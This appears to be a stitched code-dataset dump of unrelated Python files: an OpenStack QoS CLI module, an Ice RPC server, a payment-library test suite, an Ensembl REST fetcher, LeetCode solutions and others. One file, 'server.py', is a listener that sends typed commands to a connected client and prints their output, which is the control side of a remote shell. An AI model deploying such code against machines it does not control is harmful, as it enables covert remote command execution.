\"Failed to delete QoS specification with \"\n \"name or ID '%(qos)s': %(e)s\"\n )\n % {'qos': i, 'e': e}\n )\n\n if result > 0:\n total = len(parsed_args.qos_specs)\n msg = _(\n \"%(result)s of %(total)s QoS specifications failed\"\n \" to delete.\"\n ) % {'result': result, 'total': total}\n raise exceptions.CommandError(msg)\n\n\nclass DisassociateQos(command.Command):\n _description = _(\"Disassociate a QoS specification from a volume type\")\n\n def get_parser(self, prog_name):\n parser = super(DisassociateQos, self).get_parser(prog_name)\n parser.add_argument(\n 'qos_spec',\n metavar='',\n help=_('QoS specification to modify (name or ID)'),\n )\n volume_type_group = parser.add_mutually_exclusive_group()\n volume_type_group.add_argument(\n '--volume-type',\n metavar='',\n help=_('Volume type to disassociate the QoS from (name or ID)'),\n )\n volume_type_group.add_argument(\n '--all',\n action='store_true',\n default=False,\n help=_('Disassociate the QoS from every volume type'),\n )\n\n return parser\n\n def take_action(self, parsed_args):\n volume_client = self.app.client_manager.volume\n qos_spec = utils.find_resource(\n volume_client.qos_specs, parsed_args.qos_spec\n )\n\n if parsed_args.volume_type:\n volume_type = utils.find_resource(\n volume_client.volume_types, parsed_args.volume_type\n )\n volume_client.qos_specs.disassociate(qos_spec.id, volume_type.id)\n elif parsed_args.all:\n volume_client.qos_specs.disassociate_all(qos_spec.id)\n\n\nclass ListQos(command.Lister):\n _description = _(\"List QoS specifications\")\n\n def take_action(self, parsed_args):\n volume_client = self.app.client_manager.volume\n qos_specs_list = volume_client.qos_specs.list()\n\n for qos in qos_specs_list:\n try:\n qos_associations = volume_client.qos_specs.get_associations(\n qos,\n )\n if qos_associations:\n associations = [\n association.name for association in qos_associations\n ]\n qos._info.update({'associations': associations})\n except Exception as ex:\n if type(ex).__name__ == 'NotFound':\n qos._info.update({'associations': None})\n else:\n raise\n\n display_columns = (\n 'ID',\n 'Name',\n 'Consumer',\n 'Associations',\n 'Properties',\n )\n\n columns = ('ID', 'Name', 'Consumer', 'Associations', 'Specs')\n return (\n display_columns,\n (\n utils.get_dict_properties(\n s._info,\n columns,\n formatters={\n 'Specs': format_columns.DictColumn,\n 'Associations': format_columns.ListColumn,\n },\n )\n for s in qos_specs_list\n ),\n )\n\n\nclass SetQos(command.Command):\n _description = _(\"Set QoS specification properties\")\n\n def get_parser(self, prog_name):\n parser = super(SetQos, self).get_parser(prog_name)\n parser.add_argument(\n 'qos_spec',\n metavar='',\n help=_('QoS specification to modify (name or ID)'),\n )\n parser.add_argument(\n '--no-property',\n dest='no_property',\n action='store_true',\n help=_(\n 'Remove all properties from '\n '(specify both --no-property and --property to remove the '\n 'current properties before setting new properties)'\n ),\n )\n parser.add_argument(\n '--property',\n metavar='',\n action=parseractions.KeyValueAction,\n help=_(\n 'Property to add or modify for this QoS specification '\n '(repeat option to set multiple properties)'\n ),\n )\n return parser\n\n def take_action(self, parsed_args):\n volume_client = self.app.client_manager.volume\n qos_spec = utils.find_resource(\n volume_client.qos_specs, parsed_args.qos_spec\n )\n\n result = 0\n if parsed_args.no_property:\n try:\n key_list = list(qos_spec._info['specs'].keys())\n volume_client.qos_specs.unset_keys(qos_spec.id, key_list)\n except Exception as e:\n LOG.error(_(\"Failed to clean qos properties: %s\"), e)\n result += 1\n\n if parsed_args.property:\n try:\n volume_client.qos_specs.set_keys(\n qos_spec.id,\n parsed_args.property,\n )\n except Exception as e:\n LOG.error(_(\"Failed to set qos property: %s\"), e)\n result += 1\n\n if result > 0:\n raise exceptions.CommandError(\n _(\"One or more of the set operations failed\")\n )\n\n\nclass ShowQos(command.ShowOne):\n _description = _(\"Display QoS specification details\")\n\n def get_parser(self, prog_name):\n parser = super(ShowQos, self).get_parser(prog_name)\n parser.add_argument(\n 'qos_spec',\n metavar='',\n help=_('QoS specification to display (name or ID)'),\n )\n return parser\n\n def take_action(self, parsed_args):\n volume_client = self.app.client_manager.volume\n qos_spec = utils.find_resource(\n volume_client.qos_specs, parsed_args.qos_spec\n )\n\n qos_associations = volume_client.qos_specs.get_associations(qos_spec)\n if qos_associations:\n associations = [\n association.name for association in qos_associations\n ]\n qos_spec._info.update(\n {'associations': format_columns.ListColumn(associations)}\n )\n qos_spec._info.update(\n {\n 'properties': format_columns.DictColumn(\n qos_spec._info.pop('specs')\n )\n }\n )\n\n return zip(*sorted(qos_spec._info.items()))\n\n\nclass UnsetQos(command.Command):\n _description = _(\"Unset QoS specification properties\")\n\n def get_parser(self, prog_name):\n parser = super(UnsetQos, self).get_parser(prog_name)\n parser.add_argument(\n 'qos_spec',\n metavar='',\n help=_('QoS specification to modify (name or ID)'),\n )\n parser.add_argument(\n '--property',\n metavar='',\n action='append',\n default=[],\n help=_(\n 'Property to remove from the QoS specification. '\n '(repeat option to unset multiple properties)'\n ),\n )\n return parser\n\n def take_action(self, parsed_args):\n volume_client = self.app.client_manager.volume\n qos_spec = utils.find_resource(\n volume_client.qos_specs, parsed_args.qos_spec\n )\n\n if parsed_args.property:\n volume_client.qos_specs.unset_keys(\n qos_spec.id, parsed_args.property\n )\n","sub_path":"openstackclient/volume/v2/qos_specs.py","file_name":"qos_specs.py","file_ext":"py","file_size_in_byte":12246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"354538768","text":"#!/usr/bin/python\n#encoding=utf-8\nimport sys, traceback, Ice\nthisAppRootDir=\"/home/hadoop/iceGridCluster/apps/mlUtils_1.0.3\"\n#解决导包报错\nsys.path.append(thisAppRootDir)\nimport providedServices\n\nuserDictFile = thisAppRootDir+\"/dict/userdict.txt\"\nstopWordsPath = thisAppRootDir+\"/dict/stopWords.txt\"\n\n#####################Slice中接口实现#######################\n\nclass MlUtilsI(providedServices.MlUtils):\n \"\"\"\n 只执行聚类\n \"\"\"\n def performCluster(self, wholeMObjList, current=None):\n from mlUtils import cutWords\n #解析wholeMObjList,得到titleList\n titleList = cutWords.parsedMessageObj(wholeMObjList)\n #对titleList分词,过滤停用词\n cutResult = cutWords.jiebaCutwords(userDictFile, titleList, stopWordsPath)\n #计算tfidfWeight\n # cutResult:分词结果\n # True:只执行聚类\n # False:是否同时ClusterAndWeight\n from mlUtils import tfidfWeight\n tfidfMatrix = tfidfWeight.getTfidf(cutResult, True,False)\n #DBScan聚类算法\n from mlUtils import dbscanCluster\n cObjArray=dbscanCluster.runAlgAndGetReturn(wholeMObjList,tfidfMatrix)\n return cObjArray\n \"\"\"\n 只计算权重\n \"\"\"\n def performWeight(self, partMObjList, current=None):\n from mlUtils import cutWords\n titleList = cutWords.parsedMessageObj(partMObjList)\n cutResult = cutWords.jiebaCutwords(userDictFile, titleList, stopWordsPath)\n from mlUtils import tfidfWeight\n weightDict = tfidfWeight.getTfidf(cutResult, False,False)\n return weightDict\n \"\"\"\n 聚类同时计算权重\n \"\"\"\n def perfornClusterAndWeight(self, wholeMObjList, current=None):\n from mlUtils import cutWords\n titleList = cutWords.parsedMessageObj(wholeMObjList)\n cutResult = cutWords.jiebaCutwords(userDictFile, titleList, stopWordsPath)\n from mlUtils import tfidfWeight\n tfidfMatrix, weightDict = tfidfWeight.getTfidf(cutResult, False, True)\n from mlUtils import dbscanCluster\n cObjArray = dbscanCluster.runAlgAndGetReturn(wholeMObjList, tfidfMatrix)\n from providedServices import WeightAndClusterResultObj\n return WeightAndClusterResultObj(weightDict,cObjArray)\n\n##########################IceGrid##########################\n\nclass Server(Ice.Application) :\n # 继承Ice.Application,重写run方法\n def run(self, args):\n #adapter\n adapter = self.communicator().createObjectAdapter(\"mlUtils\")\n #identity\n id = Ice.stringToIdentity(\"mlUtils_1.0.3\")\n #将Server对象,identity,adapter关联\n adapter.add(MlUtilsI(), id)\n #激活adapter:会等到资源准备好后再启动\n adapter.activate()\n print(\"server started......\")\n #服务在退出前一直持续对请求监听\n self.communicator().waitForShutdown()\n return 0\n\n\napp = Server()\n#处理完毕,服务正常退出\nsys.exit(app.main(sys.argv))\n","sub_path":"pythonServer/mlUtils_1.0.3/myserver/mlUtilsServer.py","file_name":"mlUtilsServer.py","file_ext":"py","file_size_in_byte":2990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"25816800","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Feb 18 16:29:32 2019\n\n@author: ASUS\n\"\"\"\n\nimport json\nfn=\"restaurant_C_f.json\"\nwith open(fn,'r',encoding='UTF-8-sig',) as fnObj:\n data=json.load(fnObj)\n\nprint(data)\nprint(type(data))\n","sub_path":"json-練習.py","file_name":"json-練習.py","file_ext":"py","file_size_in_byte":228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"632199532","text":"\"\"\"\n标签:动态规划\n本问题可以分成多个子问题,爬第n阶楼梯的方法数量,等于 2 部分之和\n1、爬上 n-1阶楼梯的方法数量。因为再爬1阶就能到第n阶\n2、爬上 n-2阶楼梯的方法数量,因为再爬2阶就能到第n阶\n所以我们得到公式 dp[n] = dp[n-1] + dp[n-2]\n同时需要初始化 dp[0]=1和 dp[1]=1\n\n时间复杂度:O(n)\n\n\"\"\"\n\n\nclass Solution:\n def climbStairs(self, n: int) -> int:\n if n == 1:\n return 1\n if n == 2:\n return 2\n\n dp = [0] * n\n dp[0] = 1\n dp[1] = 2\n\n for i in range(2, n):\n dp[i] = dp[i-1] + dp[i-2]\n\n return dp[-1]","sub_path":"Dynamic programming/70. Climbing Stairs.py","file_name":"70. Climbing Stairs.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"538353128","text":"import socket\nimport time\n\nIP = \"127.0.0.1\"\nPORT = 5050\nADDR = (IP, PORT)\nBUFFER = 5120\nDELAY = 0.01\n\nserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nserver.bind(ADDR)\n\nserver.listen()\n\nprint(\"Waiting for a connection........\")\nconn, addr = server.accept()\n\n\ndef send(msg):\n\tmsg = msg.encode()\n\tmsg_len = len(msg)\n\tsend_len = str(msg_len).encode()\n\tsend_len += b' ' * (BUFFER - len(send_len))\n\n\ttime.sleep(DELAY)\n\tconn.send(send_len)\n\tconn.send(msg)\n\ndef recv():\n\tlength = conn.recv(BUFFER).decode()\n\tif length:\n\t\tcmd = conn.recv(int(float(length))).decode()\n\t\treturn cmd\n\nwhile True:\n\tpath = recv()\n\tcmd = input(f\"{addr[0]}@{path}$ \")\n\t\n\tif cmd == \"\":\n\t\tcmd = \" \"\n\t\n\tsend(cmd)\n\n\toutput = recv()\n\tprint(output)\n\n","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"287383845","text":"# coding=utf-8\nimport os;\nimport random\nimport sys\nfrom threading import Thread\nimport time\n\nclass Io:\n def testcapteur(self):\n print (os.system(\"gpio read 3\"))\n\n\n\nclass Afficheur(Thread):\n \"\"\"Thread chargé simplement d'afficher une lettre dans la console.\"\"\"\n\n def __init__(self, lettre):\n Thread.__init__(self)\n self.lettre = lettre\n\n def run(self):\n \"\"\"Code à exécuter pendant l'exécution du thread.\"\"\"\n i = 0\n while i < 200:\n sys.stdout.write(self.lettre+\"aaaa\")\n sys.stdout.flush()\n #attente += random.randint(1, 60) / 100\n attente = 0.2\n time.sleep(attente)\n i += 1","sub_path":"cgi-bin/Io.py","file_name":"Io.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"273923346","text":"import logging\nimport os.path\n\nfrom fabric.api import task, env\n\nlogger = logging.getLogger(os.path.basename(__file__))\n\nlog_levels = {\n 'all': logging.NOTSET,\n 'info': logging.INFO,\n 'debug': logging.DEBUG,\n 'warning': logging.WARNING,\n 'error': logging.ERROR,\n 'critical': logging.CRITICAL\n}\n\nenv.log_file = None\n\n@task\ndef file(fn):\n \"Set a file to write the log. Specify before setting the log level.\"\n fn_dir = os.path.dirname(fn)\n if len(fn_dir) != 0 and not os.path.exists(fn_dir):\n os.makedirs(fn_dir)\n\n env.log_file = fn\n\n@task\ndef set(level):\n \"Set the log level. Values may be 'info', 'debug', 'warning', 'error', 'critical'.\"\n\n if level in log_levels:\n env.logLevel = level\n\n rlogger = logging.getLogger()\n\n rlogger.setLevel(log_levels[level])\n\n if env.log_file is not None:\n rlogger.handlers[0].stream.close()\n rlogger.removeHandler(rlogger.handlers[0])\n\n formatter = logging.Formatter(fmt=\"%(asctime)s %(filename)s %(funcName)s() [%(lineno)d] %(levelname)s: %(message)s\")\n\n file_handler = logging.FileHandler(env.log_file)\n file_handler.setFormatter(formatter)\n rlogger.addHandler(file_handler)\n\n logger.info('loging to file {0}'.format(env.log_file))\n\n logger.debug('set logging level to {0}'.format(log_levels[level]))\n","sub_path":"fabsrc/log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":1390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"211928436","text":"class Solution:\n def permuteUnique(self, nums: List[int]) -> List[List[int]]:\n ans,length=[],len(nums)\n check=[0 for i in range(length)]\n nums.sort()\n\n def helper(check, cur):\n if(len(cur)==length):ans.append(cur)\n for i in range(length):\n if(check[i]==1): continue\n if(i>0 and nums[i-1]==nums[i] and check[i-1]==0): continue\n check[i]=1\n helper(check,cur+[nums[i]])\n check[i]=0\n helper(check,[])\n return ans","sub_path":"Week_03/47_permutations-ii.py","file_name":"47_permutations-ii.py","file_ext":"py","file_size_in_byte":550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"652747777","text":"# coding: utf-8\nimport unittest\n\nfrom pagseguro import PagSeguro, PagSeguroTransactionSearchResult\nfrom pagseguro.configs import Config\nfrom pagseguro.exceptions import PagSeguroValidationError\nfrom pagseguro.utils import is_valid_email, is_valid_cpf\n\n\nclass PagseguroTest(unittest.TestCase):\n\n def setUp(self):\n self.token = '123456'\n self.email = 'seu@email.com'\n self.pagseguro = PagSeguro(token=self.token, email=self.email)\n self.sender = {\n 'name': u'Guybrush Treepwood',\n 'area_code': 11,\n \"phone\": 5555555,\n \"email\": 'guybrush@monkeyisland.com',\n \"cpf\": \"00000000000\",\n \"born_date\": \"06/08/1650\",\n }\n self.shipping = {\n \"type\": self.pagseguro.SEDEX,\n \"street\": \"Av Brig Faria Lima\",\n \"number\": 1234,\n \"complement\": \"5 andar\",\n \"district\": \"Jardim Paulistano\",\n \"postal_code\": \"06650030\",\n \"city\": \"Sao Paulo\",\n \"state\": \"SP\",\n \"country\": \"BRA\",\n \"cost\": \"1234.56\"\n }\n self.items = [\n {\"id\": \"0001\", \"description\": \"Produto 1\", \"amount\": 354.20,\n \"quantity\": 2, \"weight\": 200},\n {\"id\": \"0002\", \"description\": \"Produto 2\", \"amount\": 355.20,\n \"quantity\": 1, \"weight\": 200},\n ]\n\n def test_pagseguro_class(self):\n self.assertIsInstance(self.pagseguro, PagSeguro)\n\n def test_pagseguro_initial_attrs(self):\n self.assertIsInstance(self.pagseguro.config, Config)\n self.assertIsInstance(self.pagseguro.data, dict)\n self.assertIn('email', self.pagseguro.data)\n self.assertIn('token', self.pagseguro.data)\n self.assertEqual(self.pagseguro.data['email'], self.email)\n self.assertEqual(self.pagseguro.data['token'], self.token)\n self.assertIsInstance(self.pagseguro.items, list)\n self.assertIsInstance(self.pagseguro.sender, dict)\n self.assertIsInstance(self.pagseguro.shipping, dict)\n self.assertEqual(self.pagseguro._reference, \"\")\n self.assertIsNone(self.pagseguro.extra_amount)\n self.assertIsNone(self.pagseguro.redirect_url)\n self.assertIsNone(self.pagseguro.notification_url)\n self.assertIsNone(self.pagseguro.abandon_url)\n\n def test_build_checkout_params_with_all_params(self):\n self.pagseguro.sender = self.sender\n self.pagseguro.shipping = self.shipping\n self.pagseguro.extra_amount = 12.50\n self.pagseguro.redirect_url = '/redirecionando/'\n self.pagseguro.abandon_url = '/abandonando/'\n self.pagseguro.items = self.items\n self.pagseguro.build_checkout_params()\n # check all data fields\n self.assertIsInstance(self.pagseguro.data, dict)\n keys = ['email', 'token', 'senderName', 'senderAreaCode',\n 'senderPhone', 'senderEmail', 'senderCPF', 'senderBornDate',\n 'shippingType', 'shippingAddressStreet',\n 'shippingAddressNumber', 'shippingAddressComplement',\n 'shippingAddressDistrict', 'shippingAddressPostalCode',\n 'shippingAddressCity', 'shippingAddressState',\n 'shippingAddressCountry', 'shippingCost', 'extraAmount',\n 'redirectURL', 'abandonURL']\n # items\n item_keys = ['itemId%s', 'itemDescription%s', 'itemAmount%s',\n 'itemQuantity%s', 'itemWeight%s', 'itemShippingCost%s']\n\n for key in keys:\n self.assertIn(key, self.pagseguro.data)\n\n for i, key in enumerate(item_keys, 1):\n self.assertTrue(key % i, self.pagseguro.data)\n\n def test_add_items_util(self):\n pagseguro = PagSeguro(email=self.email, token=self.token)\n pagseguro.add_item(**self.items[0])\n pagseguro.add_item(**self.items[1])\n self.assertEqual(len(pagseguro.items), 2)\n\n def test_reference(self):\n self.pagseguro.reference = '12345'\n self.assertEqual(unicode(self.pagseguro.reference), u'REF12345')\n\n def test_clean_none_params(self):\n pagseguro = PagSeguro(email=self.email, token=self.token)\n sender = self.sender\n sender['cpf'] = None\n sender['born_date'] = None\n pagseguro.sender = self.sender\n pagseguro.build_checkout_params()\n\n self.assertNotIn('senderCPF', pagseguro.data)\n self.assertNotIn('senderBornData', pagseguro.data)\n\n def test_is_valid_email(self):\n bad_email = 'john.com'\n pagseguro = PagSeguro(email=bad_email, token=self.token)\n pagseguro.sender = {\n 'email': bad_email\n }\n with self.assertRaises(PagSeguroValidationError):\n pagseguro.build_checkout_params()\n\n # Now testing with a valid email\n pagseguro.sender['email'] = self.sender.get('email')\n self.assertEqual(is_valid_email(pagseguro.sender['email']),\n self.sender.get('email'))\n\n def test_is_valid_cpf(self):\n bad_cpf = '123.456.267-45'\n pagseguro = PagSeguro(email=self.email, token=self.token)\n pagseguro.sender = {\n 'cpf': bad_cpf\n }\n with self.assertRaises(PagSeguroValidationError):\n pagseguro.build_checkout_params()\n\n # Now testing with a valid email\n pagseguro.sender['cpf'] = '482.268.465-28'\n self.assertEqual(is_valid_cpf(pagseguro.sender['cpf']),\n pagseguro.sender['cpf'])\n\n pagseguro.sender['cpf'] = '48226846528'\n self.assertEqual(is_valid_cpf(pagseguro.sender['cpf']),\n pagseguro.sender['cpf'])\n\n\nclass PagSeguroTransactionSearchResultTest(unittest.TestCase):\n\n def setUp(self):\n self.email = 'seu@email.com'\n self.token = '123456'\n self.xml = \"\"\"\n \n 2011-02-16T20:14:35.000-02:00\n 1\n 2\n 1\n \n \n 2011-02-05T15:46:12.000-02:00\n 2011-02-15T17:39:14.000-03:00\n 9E884542-81B3-4419-9A75-BCC6FB495EF1\n REF1234\n 1\n 3\n \n 1\n \n 49900.00\n 0.00\n 0.00\n 49900.00\n 0.00\n \n \n 2011-02-07T18:57:52.000-02:00\n 2011-02-14T21:37:24.000-03:00\n 2FB07A22-68FF-4F83-A356-24153A0C05E1\n REF5678\n 3\n 4\n \n 3\n \n 26900.00\n 0.00\n 0.00\n 26900.00\n 0.00\n \n \n \"\"\"\n\n def test_parse_xml(self):\n pg = PagSeguro(email=self.email, token=self.token)\n result = PagSeguroTransactionSearchResult(\n self.xml, pg.config\n )\n self.assertEqual(result.current_page, 1)\n self.assertEqual(result.results_in_page, 2)\n self.assertEqual(result.total_pages, 1)\n self.assertEqual(len(result.transactions), 2)\n","sub_path":"tests/test_pagseguro.py","file_name":"test_pagseguro.py","file_ext":"py","file_size_in_byte":8092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"561483388","text":"\"\"\"\nMain_EnsemblREST.py\nMarcus Viscardi Aug 5, 2020\n\nTrying to pull everything together into one script to make later reuse easier\n\"\"\"\n\nimport requests, sys, json\nfrom pprint import pprint\n\nSERVER = \"https://rest.ensembl.org\"\n\n\ndef fetch_endpoint(server, request, content_type='application/json',params={}):\n \"\"\"\n Fetch an endpoint from the server, allow overriding of default content-type\n \"\"\"\n url = server+request\n headers={\n \"Accept\": content_type\n }\n r = requests.get(url,headers=headers,params=params)\n\n if not r.ok:\n r.raise_for_status()\n raise Exception(\"Endpoint failed.\")\n\n if content_type == 'application/json':\n return r.json()\n else:\n return r.text\n\n\ndef fetch_endpoint_POST(server, request, data, content_type='application/json', params={}):\n url = server + request\n headers = {\n \"Content-Type\": content_type\n }\n r = requests.post(url,headers=headers,json=data,params=params)\n\n if not r.ok:\n r.raise_for_status()\n raise Exception(\"Posting to endpoint failed.\")\n\n if content_type == 'application/json':\n return r.json()\n else:\n return r.text\n\n\nif __name__ == '__main__':\n # First pull all members of the protein family\n params = {\n 'sequence': 'none',\n 'aligned': '0',\n 'member_source': 'ensembl'\n }\n prot_family_dict = fetch_endpoint(SERVER,\"/family/id/PTHR15696_SF1\",params=params)\n \n # Isolate just the gene IDs from here\n members_geneIDs = set(protein['gene_stable_id'] for protein in prot_family_dict['members'])\n \n # Convert back and forth to a set to remove redundant genes, these will show up again when looking for transcripts\n # (I think...)\n members_geneIDs = list(members_geneIDs)\n \n # The maximum post size seems to be 50 for Ensembl, iterate through the IDs in sets of 49!\n for i in range(0, len(members_geneIDs), 50):\n try:\n data = { \"ids\" : members_geneIDs[i:i+49] }\n print(f\"Running geneIDs {i} - {i+49}\")\n except IndexError:\n data = { \"ids\" : members_geneIDs[i:] }\n print(f\"Running geneIDs {i} - {len(members_geneIDs)}\")\n #print(data)\n params = {\n 'type': 'cds',\n }\n family_seqs_list = fetch_endpoint_POST(SERVER, \"/sequence/id\", data, params=params)\n \n print(family_seqs_list)\n fasta_output = \"200805_Ensembl_PTHR15696_SF1_CDS.fasta\"\n with open(fasta_output, 'a', encoding='utf-8') as f: # Append to the file with each loop\n for hit in family_seqs_list:\n f.write(f\">{hit['query']}({hit['id']})->CDS\\n\")\n f.write(f\"{hit['seq']}\\n\")\n","sub_path":"Main_EnsemblREST.py","file_name":"Main_EnsemblREST.py","file_ext":"py","file_size_in_byte":2720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"348858553","text":"# -*- coding: utf-8 -*-\n#! usr/bin/env python3\n\"\"\"\nText formatting tags:\n int[2] BACKGROUND_COLOR_BUFSIZE -> Size of font background color buffer\n str[] KWARG_ANTIALIAS -> Keywords for font antialiasing\n str[] KWARG_BACKGROUND_COLOR -> ...for background color\n str[] KWARG_BACKGROUND_WIDTH -> ...for background width\n str[] KWARG_CENTER_X -> ...for horz. text centering\n str[] KWARG_CENTER_Y -> ...for vert. text centering\n str[] KWARG_FONT_COLOR -> ...for font color\n str[] KWARG_DESCRIPTION -> ...for text object debug label\n str[] KWARG_FONT_NAME -> ...for font name\n str[] KWARG_SHADOW_COLOR -> ...for text shadow color\n str[] KWARG_SHADOW_X_POSITION -> ...for text shadow x-pos\n str[] KWARG_SHADOW_Y_POSITION -> ...for text shadow y-pos\n str[] KWARG_STRING -> ...for renderable string\n str[] KWARG_X_PADDING -> ...for horizontal char padding\n str[] KWARG_Y_PADDING -> ...for vertical char padding\n float RENDER_RESET_TIME -> Time delay upon text clear\n str STYLE_TAG_BACKGROUND_COLOR -> Style tag for background color\n str STYLE_TAG_BORDER_COLOR -> ...for text border color\n str STYLE_TAG_BORDER_HEIGHT -> ...for text border height\n str STYLE_TAG_BORDER_WIDTH -> ...for text border width\n str STYLE_TAG_FONT_COLOR -> ...for text color\n str STYLE_TAG_FONT_NAME -> ...for font name\n str STYLE_TAG_SHADOW_COLOR -> ...for text shadow color\n str STYLE_TAG_SHADOW_X_POSITION -> ...for text shadow x-pos\n str STYLE_TAG_SHADOW_Y_POSITION -> ...for text shadow y-pos\n\"\"\"\nimport re\n\nBACKGROUND_COLOR_BUFSIZE = 64, 64\nKWARG_ANTIALIAS = 'aa', 'antialias'\nKWARG_BACKGROUND_COLOR = 'bg', 'background'\nKWARG_BACKGROUND_WIDTH = 'bw', 'border-w'\nKWARG_BORDER_COLOR = 'bc', 'border-color'\nKWARG_BORDER_HEIGHT = 'bh', 'border-h'\nKWARG_CENTER_X = 'cx', 'center-x'\nKWARG_CENTER_Y = 'cy', 'center-y'\nKWARG_DESCRIPTION = 'tag', 'description'\nKWARG_FONT_ALPHA = 'alpha', 'opacity'\nKWARG_FONT_COLOR = 'col', 'color'\nKWARG_FONT_FILENAME = 'fn', 'file', 'filename'\nKWARG_FONT_HEIGHT = 'h', 'height'\nKWARG_FONT_NAME = 'fon', 'font'\nKWARG_FONT_ROTATE = 'rot', 'rotate'\nKWARG_FONT_SOURCERECT = 'pos', 'position'\nKWARG_FONT_VERTICAL = 'v', 'vertical'\nKWARG_FONT_WIDTH = 'w', 'height'\nKWARG_SHADOW_COLOR = 'sc', 'shadow-color'\nKWARG_SHADOW_X_POSITION = 'sx', 'shadow-x'\nKWARG_SHADOW_Y_POSITION = 'sy', 'shadow-y'\nKWARG_STRING = 'str', 'string'\nKWARG_X_PADDING = 'xp', 'x-pad', 'px', 'pad-x'\nKWARG_Y_PADDING = 'yp', 'y-pad', 'py', 'pad-y'\nRENDER_RESET_TIME = 0.25\nSTYLE_TAG_BACKGROUND_COLOR = 'bg'\nSTYLE_TAG_BORDER_COLOR = 'bc'\nSTYLE_TAG_BORDER_HEIGHT = 'bh'\nSTYLE_TAG_BORDER_WIDTH = 'bw'\nSTYLE_TAG_DEFAULT = 'default'\nSTYLE_TAG_FONT_COLOR = 'color'\nSTYLE_TAG_FONT_NAME = 'font'\nSTYLE_TAG_SHADOW_COLOR = 'sc'\nSTYLE_TAG_SHADOW_X_POSITION = 'sx'\nSTYLE_TAG_SHADOW_Y_POSITION = 'sy'\n\n# Require ints for these tags\nNUMBERED = 'bw', 'bh', 'sx', 'sy'\n\n# Base (default) font style tag\nBASE_STYLE_TAG = '<{}>'.format('|'.join([\n '{}={{}}'.format(x)\n for x in (STYLE_TAG_FONT_NAME,\n STYLE_TAG_FONT_COLOR,\n STYLE_TAG_BACKGROUND_COLOR,\n STYLE_TAG_BORDER_WIDTH,\n STYLE_TAG_BORDER_HEIGHT,\n STYLE_TAG_BORDER_COLOR,\n STYLE_TAG_SHADOW_X_POSITION,\n STYLE_TAG_SHADOW_Y_POSITION,\n STYLE_TAG_SHADOW_COLOR,\n )\n]))\n\n# Miscellaneous strings and regular expressions\nBR = '
'\nPAD = '#'\nREP = re.compile(r'(<)(/)?([ a-zA-Z0-9\\-=|:]*)(>)')\nTAG = re.compile(r'')\nVAR = re.compile(r'<([ \\-a-zA-Z0-9_]+).([\\-a-zA-Z0-9_]+)>')\n","sub_path":"engine/text/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":4102,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"10640598","text":"import hou\r\nimport autoNode\r\n\r\nimport glob\r\nimport os\r\nimport re\r\n\r\ndef init_RS():\r\n # Create RS ROPs\r\n out = hou.node(\"/out\")\r\n rop = autoNode.createRedshiftRop(out)\r\n rop.setParms({\"RS_renderCamera\":\"cam_1080\"})\r\n autoNode.createRedshiftIPR(out)\r\n\r\n # Default materials with AE Gallery application?\r\n # shop = hou.node(\"/shop\")\r\n # mat = shop.createNode(\"RS_Material\", \"Base\")\r\n # entries = hou.galleries.galleryEntries(node_type=hou.nodeType(hou.shopNodeTypeCategory(), \"RS_Material\"))\r\n # if entries:\r\n # for entry in entries:\r\n # entry.applyToNode(mat)\r\n\r\n # inc = shop.createNode(\"rs_incandescent\", \"Solid\")\r\n # inc.move(hou.Vector2(0, 1))\r\n # entries = hou.galleries.galleryEntries(node_type=hou.nodeType(hou.shopNodeTypeCategory(), \"rs_incandescent\"))\r\n # if entries:\r\n # for entry in entries:\r\n # entry.applyToNode(inc)\r\n\r\n # Default camera\r\n obj = hou.node(\"/obj\")\r\n cam = obj.createNode(\"cam\", \"cam_1080\")\r\n cam.setParms({\"resx\": 1920, \"resy\": 1080})\r\n \r\n # Default Light\r\n dome = obj.createNode(\"rslightdome\", \"Dome\")\r\n dome.move(hou.Vector2(0, 1))\r\n\r\n # does this work form a shelf?\r\n hou.hscript('Redshift_objectSpareParameters')\r\n hou.hscript('Redshift_cameraSpareParameters')","sub_path":"scripts/python/aeutils.py","file_name":"aeutils.py","file_ext":"py","file_size_in_byte":1302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"98004524","text":"\"\"\"\n\n450. Delete Node in a BST\n\nGiven a root node reference of a BST and a key, delete the node with the given key in the BST. Return the root node reference (possibly updated) of the BST.\n\nBasically, the deletion can be divided into two stages:\n\nSearch for a node to remove.\nIf the node is found, delete the node.\nNote: Time complexity should be O(height of tree).\n\nExample:\n\nroot = [5,3,6,2,4,null,7]\nkey = 3\n\n 5\n / \\\n 3 6\n / \\ \\\n2 4 7\n\nGiven key to delete is 3. So we find the node with value 3 and delete it.\n\nOne valid answer is [5,4,6,2,null,null,7], shown in the following BST.\n\n 5\n / \\\n 4 6\n / \\\n2 7\n\nAnother valid answer is [5,2,6,null,4,null,7].\n\n 5\n / \\\n 2 6\n \\ \\\n 4 7\n\n\"\"\"\n\n#\n'''\n\nSteps:\n\nRecursively find the node that has the same value as the key, while setting the left/right nodes equal to the returned subtree\nOnce the node is found, have to handle the below 4 cases\nnode doesn't have left or right - return null\nnode only has left subtree- return the left subtree\nnode only has right subtree- return the right subtree\nnode has both left and right - find the minimum value in the right subtree, set that value to the currently found node, then recursively delete the minimum value in the right 